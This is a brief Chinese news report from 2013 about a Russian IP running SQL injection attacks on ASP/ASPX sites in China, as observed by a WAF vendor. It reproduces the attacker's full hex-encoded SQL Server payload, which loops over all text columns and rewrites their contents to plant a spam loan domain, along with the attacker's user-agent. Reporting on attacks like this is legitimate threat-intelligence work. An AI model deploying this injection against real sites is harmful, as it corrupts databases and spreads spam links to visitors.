俄罗斯骇客单搞中国 只因内地ASP网站多

2013 年 7 月 30 日4950

ASP是微软公司开发的代替CGI脚本程序的一种应用,它可以与数据库和其它程序进行交互,是一种简单、方便的编程工具,与微软SQL Server搭配可发挥最佳效果。鼎盛时期几乎成为国内网站开发的标准,后来渐渐被JSP和PHP、ASPX所替代。

国内云WAF提供商加速乐团队最近监测到一个来自俄罗斯IP(91.220.131.34)的攻击,经分析:此IP只对中国的网站发起SQL Server数据库的注入攻击。与大多攻击不同的是,此IP的攻击较直接、且带破坏性,被攻击的网站没有任何关联性,但这些网站共同的特点是,它们都是用ASP和ASPX语言开发的,初步估计,选择攻击中国的网站是由于国内仍有不少网站使用ASP技术,而ASP在国外目前已经基本上不流行。

此IP提交的攻击恶意代码如下:

'+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c202727636f72797061796461796c6f616e732e636f6d27272c2027276d6178787061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b6520272725636f72797061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--

使用的User-Agent是:

Mozilla/5.0|(Windows;|U;|Windows|NT|5.2;|en-US)|AppleWebKit/534.17|(KHTML,|like|Gecko)|Chrome/11.0.652.0|Safari/534.17

0 0